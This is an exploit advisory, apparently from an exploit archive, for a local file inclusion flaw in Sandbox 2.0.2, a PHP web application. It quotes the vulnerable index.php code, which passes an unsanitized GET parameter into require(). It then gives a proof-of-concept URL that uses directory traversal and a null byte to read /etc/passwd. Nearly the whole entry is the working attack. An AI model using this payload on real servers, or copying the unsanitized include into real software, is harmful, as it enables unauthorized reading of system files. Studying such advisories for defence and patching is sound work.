Sandbox 2.0.2 - Local File Inclusion

Author: saudi0hacker
type: webapps
platform: php
port: 
date_added: 2010-07-04 
date_updated: 2010-07-15 
verified: 1 
codes: OSVDB-65985 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comSandbox-2.0.2.tgz

: # Tested on: Linux os                                                    :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com   :
----------------------------------------------------------------------------

 [+] file:index.php on line 75
 [+] Code:
 <?
 else {
	$module = $_GET['a'];
 }

 require 'modules/'  . $module . '.php';
 ?>

 [+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00